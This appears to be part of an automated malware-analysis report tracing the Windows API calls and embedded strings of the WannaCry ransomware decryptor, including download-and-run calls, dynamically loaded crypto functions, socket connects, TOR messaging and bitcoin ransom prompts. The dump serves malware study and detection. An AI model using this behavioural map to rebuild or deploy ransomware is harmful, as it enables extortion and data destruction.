      • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
      • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
      • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
      • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
    • CreateProcessA.KERNEL32(00000000,?), ref: 0040B9AA
    • WaitForSingleObject.KERNEL32(?,00001388), ref: 0040B9CF
    • WaitForSingleObject.KERNEL32(?,00007530), ref: 0040B9E2
    • CloseHandle.KERNEL32(?), ref: 0040B9EF
    • CloseHandle.KERNEL32(?), ref: 0040B9F6
      • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000000,00000428), ref: 0040B6B4
      • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
      • Part of subcall function 0040B6A0: sprintf.MSVCRT ref: 0040B74E
    APIs
      • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
      • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005), ref: 0040B638
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
      • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
      • Part of subcall function 0040B620: SetFocus.USER32(00000000), ref: 0040B66A
      • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000), ref: 0040B671
      • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
      • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
    • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
    • #2621.MFC42 ref: 00405A96
    • #6438.MFC42 ref: 00405A9B
      • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
    • #2514.MFC42 ref: 00405AC1
      • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
      • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
    • #800.MFC42 ref: 00405C33
    • #800.MFC42 ref: 00405C47
    • #800.MFC42 ref: 00405C5B
    • #800.MFC42 ref: 00405C6F
    • #781.MFC42 ref: 00405C83
      • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
      • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
      • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
      • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
      • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
      • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
    • #609.MFC42 ref: 00405D37
    • #609.MFC42 ref: 00405D4B
    • #616.MFC42 ref: 00405D5C
    • #641.MFC42 ref: 00405D70
    APIs
      • Part of subcall function 00404C40: #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
      • Part of subcall function 00404C40: #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
      • Part of subcall function 00404C40: #860.MFC42(00421798), ref: 00404CAD
    • #2514.MFC42 ref: 00407AF1
    • #537.MFC42(***), ref: 00407B04
    • #941.MFC42(00421234,***), ref: 00407B1A
    • #939.MFC42(?,00421234,***), ref: 00407B28
    • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
    • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
    • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
      • Part of subcall function 004082C0: #4278.MFC42(000003E8,00000000,000003E8,?,?,76923ABC), ref: 0040830D
      • Part of subcall function 004082C0: #858.MFC42 ref: 00408322
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408332
      • Part of subcall function 004082C0: #1200.MFC42(Too short message!,00000000,00000000,?,?,76923ABC), ref: 00408354
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040836B
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040837F
      • Part of subcall function 004082C0: #540.MFC42 ref: 004083C8
      • Part of subcall function 004082C0: time.MSVCRT ref: 004083D6
      • Part of subcall function 004082C0: #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
      • Part of subcall function 004082C0: #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
      • Part of subcall function 004082C0: #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408440
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040844E
      • Part of subcall function 004082C0: fopen.MSVCRT ref: 00408487
      • Part of subcall function 004082C0: #800.MFC42 ref: 004084A8
      • Part of subcall function 004082C0: fread.MSVCRT ref: 004084C2
      • Part of subcall function 004082C0: fclose.MSVCRT ref: 004084C9
      • Part of subcall function 004082C0: #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
      • Part of subcall function 004082C0: time.MSVCRT ref: 00408528
      • Part of subcall function 004082C0: #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040855B
    • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
    • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
    • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
    • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
    • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
    • #2385.MFC42(?,?,?), ref: 00407C0E
    APIs
    • #2302.MFC42(?,0000040F,?), ref: 004063B2
    • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
    • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
    • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
    • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
    • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
    • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
    • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
    • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
    • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
    • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
    • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
    • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
    • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
    • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
    APIs
      • Part of subcall function 00411660: malloc.MSVCRT ref: 004116C8
      • Part of subcall function 00411660: malloc.MSVCRT ref: 004116E7
      • Part of subcall function 00411660: free.MSVCRT(00000000,?,?,?,?,?,?,?,00000000), ref: 00411707
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
      • Part of subcall function 00411CF0: #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411E5B
      • Part of subcall function 00411CF0: #825.MFC42(00000000), ref: 00411E84
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F04
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F1B
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F32
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F49
      • Part of subcall function 00411CF0: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00412078
      • Part of subcall function 00411CF0: #825.MFC42(?,?,?,?,?,?,?,?,?,?,?), ref: 004121FB
    • wsprintfA.USER32 ref: 004125F9
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 0041262A
    • wsprintfA.USER32 ref: 00412684
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(00000000), ref: 00412338
      • Part of subcall function 00412250: CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C
    • #823.MFC42(00004000), ref: 004126BF
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00412714
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0041275F
    • CloseHandle.KERNEL32(00000000), ref: 00412770
    APIs
    • FindWindowW.USER32(00000000,00000000), ref: 0040B628
    • ShowWindow.USER32(00000000,00000005), ref: 0040B638
    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
    • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
    • SetForegroundWindow.USER32(00000000), ref: 0040B663
    • SetFocus.USER32(00000000), ref: 0040B66A
    • SetActiveWindow.USER32(00000000), ref: 0040B671
    • BringWindowToTop.USER32(00000000), ref: 0040B678
    • ExitProcess.KERNEL32 ref: 0040B689
    APIs
    • CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
    • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
    APIs
    • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
    • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
    • #5277.MFC42 ref: 00404402
    APIs
    • free.MSVCRT(00000000,?,?,?,?,?,?,?,00000000), ref: 00411707
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
    • malloc.MSVCRT ref: 004116C8
    • malloc.MSVCRT ref: 004116E7
    APIs
    • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
    APIs
    • SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B

    Non-executed Functions

    APIs
      • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
      • Part of subcall function 004076A0: sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
      • Part of subcall function 004076A0: #540.MFC42 ref: 00407876
      • Part of subcall function 004076A0: _ftol.MSVCRT ref: 004078AA
      • Part of subcall function 004076A0: #2818.MFC42(?,$%d,00000000), ref: 004078BE
      • Part of subcall function 004076A0: #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
      • Part of subcall function 004076A0: #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
      • Part of subcall function 004076A0: #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
      • Part of subcall function 004076A0: #3092.MFC42(00000402,?), ref: 0040791D
      • Part of subcall function 004076A0: #6199.MFC42(00000402,?), ref: 00407924
      • Part of subcall function 004076A0: InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
      • Part of subcall function 004076A0: #800.MFC42 ref: 0040799F
    • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FBC
    • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FCF
    • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FE2
    • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FF5
    • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407005
    • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407018
    • CreateSolidBrush.GDI32(00107C10), ref: 00407022
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 0040702B
    • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 0040703E
    • CreateSolidBrush.GDI32(00D77800), ref: 00407048
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407051
    • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407064
    • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 0040709C
    • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 004070CE
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407104
    • #3092.MFC42(000003ED,00000000,?,767AAD28,?), ref: 00407110
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
    • #3092.MFC42(000003FE,?,767AAD28,?), ref: 00407134
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
    • #3092.MFC42(000003FB,?,767AAD28,?), ref: 00407156
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
    • #3092.MFC42(000003FF,?,767AAD28,?), ref: 00407178
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
    • #3092.MFC42(000003FC,?,767AAD28,?), ref: 0040719A
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
    • #3092.MFC42(00000400,?,767AAD28,?), ref: 004071BC
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
    • #3092.MFC42(000003FA,?,767AAD28,?), ref: 004071DE
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
    • #3092.MFC42(00000402,?,767AAD28,?), ref: 004071FC
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
    • #3092.MFC42(000003EF,?,767AAD28,?), ref: 0040721E
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
    • #3092.MFC42(000003EB,?,767AAD28,?), ref: 00407240
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
    • #3092.MFC42(000003EC,?,767AAD28,?), ref: 00407262
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
    • #860.MFC42(?,?,767AAD28,?), ref: 00407288
    • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,767AAD28,?), ref: 004072F9
      • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
      • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
    • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,767AAD28,?), ref: 00407315
    • #540.MFC42(?,?,?,?,767AAD28,?), ref: 00407329
    • #2818.MFC42(?,mailto:%s,?,?,?,?,?,767AAD28,?), ref: 0040734A
    • #535.MFC42(?), ref: 0040735D
    • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
    • #535.MFC42(?), ref: 00407398
    • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
    • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
    • #6140.MFC42(00000002,000000FF), ref: 004073D6
    • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
      • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
      • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
      • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
      • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
      • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
      • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
      • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
      • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    • GetTimeZoneInformation.KERNEL32(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
      • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00407520
    • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 004075AD
    • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
    • #6334.MFC42(00000000), ref: 00407607
    • #800.MFC42 ref: 0040761B
    APIs
      • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
    • swprintf.MSVCRT ref: 00402728
    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
    • wcscmp.MSVCRT ref: 004027E1
    • wcscmp.MSVCRT ref: 004027FB
    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
    • GetFileAttributesW.KERNEL32(?), ref: 00402830
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
      • Part of subcall function 00402AF0: _wcsnicmp.MSVCRT ref: 00402AFF
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402B18
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B39
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B53
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B6D
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B87
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402BA1
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402BBB
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402BD5
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402BF3
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402C0D
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402C27
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
    • wcslen.MSVCRT ref: 0040286E
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
    • wcscmp.MSVCRT ref: 004028C3
    • wcscmp.MSVCRT ref: 004028DD
    • wcscmp.MSVCRT ref: 004028F3
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00402909
    • wcslen.MSVCRT ref: 00402914
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 00402923
      • Part of subcall function 00402DA0: #823.MFC42(00000018,768ED335,768ED3B7,?,00000000,00402949), ref: 00402DAF
    • FindNextFileW.KERNEL32(?,?), ref: 0040296A
    • FindClose.KERNEL32(?), ref: 0040297D
      • Part of subcall function 00402560: wcscpy.MSVCRT ref: 0040257D
      • Part of subcall function 00402560: wcsrchr.MSVCRT ref: 0040258A
      • Part of subcall function 00402560: _wcsicmp.MSVCRT ref: 004025A5
      • Part of subcall function 00402560: _wcsicmp.MSVCRT ref: 004025B4
      • Part of subcall function 00402560: wcscat.MSVCRT ref: 004025D3
      • Part of subcall function 00402560: DeleteFileW.KERNEL32(?), ref: 004025F0
      • Part of subcall function 00402560: MoveFileW.KERNEL32(?,?), ref: 00402604
      • Part of subcall function 00402560: DeleteFileW.KERNEL32(?), ref: 0040262E
      • Part of subcall function 004026B0: #825.MFC42(?,?,?,?), ref: 0040276F
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 004027A5
    • swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 00402A0C
    • DeleteFileW.KERNEL32(?), ref: 00402A16
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 00402A2C
    • DeleteFileW.KERNEL32(?), ref: 00402A36
    • #825.MFC42(?), ref: 00402A6B
    • #825.MFC42(?), ref: 00402ABF
      • Part of subcall function 00402E90: #825.MFC42(?,?,?,?,00402AB4,?,?,?,00000000), ref: 00402EC8
      • Part of subcall function 00402E90: #825.MFC42(?,?,?,?,00402AB4,?,?,?,00000000), ref: 00402EE6
    APIs
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
    • OpenClipboard.USER32(?), ref: 004035E9
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
    • #3301.MFC42(?,00000000,00000000), ref: 0040361A
    • #924.MFC42 ref: 00403635
    • #800.MFC42 ref: 00403646
    • #800.MFC42 ref: 00403665
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
    • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
    • GlobalLock.KERNEL32(00000000), ref: 0040369C
    • GlobalFree.KERNEL32(00000000), ref: 004036AB
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
    • #3301.MFC42(?,00000000,00000000), ref: 004036E7
    • #924.MFC42(00000000), ref: 00403702
    • #800.MFC42(00000000), ref: 00403713
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
    • wcslen.MSVCRT ref: 00403753
    • wcslen.MSVCRT ref: 0040377B
    • #800.MFC42 ref: 00403797
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
    • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
    • EmptyClipboard.USER32 ref: 004037D4
    • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
    • CloseClipboard.USER32 ref: 004037E3
    APIs
    • FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
    • sscanf.MSVCRT ref: 00403D26
    • fopen.MSVCRT ref: 00403D45
    • fread.MSVCRT ref: 00403D69
    • sprintf.MSVCRT ref: 00403D99
      • Part of subcall function 00401C30: inet_ntoa.WS2_32(?), ref: 00401C3F
    • SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
    • #823.MFC42(00000088), ref: 00403DE4
    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
    • fclose.MSVCRT ref: 00403E16
    • FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
    • FindClose.KERNEL32(?), ref: 00403E3B
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404B86
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00402C46), ref: 00404BA3
    • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,00402C46), ref: 00404BB0
    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,00402C46), ref: 00404BBD
    • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,00402C46), ref: 00404BCA
    • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,00402C46), ref: 00404BD7
    • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,00402C46), ref: 00404BE4
    APIs
    • FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
    • sscanf.MSVCRT ref: 0040816A
    • fopen.MSVCRT ref: 00408185
    • fread.MSVCRT ref: 004081A0
    • fclose.MSVCRT ref: 004081BE
    • FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
    • FindClose.KERNEL32(?), ref: 00408200
    • sprintf.MSVCRT ref: 00408266
    • #537.MFC42(?,?,00000000), ref: 00408280
      • Part of subcall function 004082C0: #4278.MFC42(000003E8,00000000,000003E8,?,?,76923ABC), ref: 0040830D
      • Part of subcall function 004082C0: #858.MFC42 ref: 00408322
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408332
      • Part of subcall function 004082C0: #1200.MFC42(Too short message!,00000000,00000000,?,?,76923ABC), ref: 00408354
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040836B
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040837F
      • Part of subcall function 004082C0: #540.MFC42 ref: 004083C8
      • Part of subcall function 004082C0: time.MSVCRT ref: 004083D6
      • Part of subcall function 004082C0: #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
      • Part of subcall function 004082C0: #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
      • Part of subcall function 004082C0: #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408440
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040844E
      • Part of subcall function 004082C0: fopen.MSVCRT ref: 00408487
      • Part of subcall function 004082C0: #800.MFC42 ref: 004084A8
      • Part of subcall function 004082C0: fread.MSVCRT ref: 004084C2
      • Part of subcall function 004082C0: fclose.MSVCRT ref: 004084C9
      • Part of subcall function 004082C0: #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
      • Part of subcall function 004082C0: time.MSVCRT ref: 00408528
      • Part of subcall function 004082C0: #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040855B
    • #537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2
    APIs
    • htons.WS2_32 ref: 0040D6C7
    • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
    • bind.WS2_32(00000000,?,00000010), ref: 0040D709
    • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
    • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
    • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
    • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
    • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
    • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
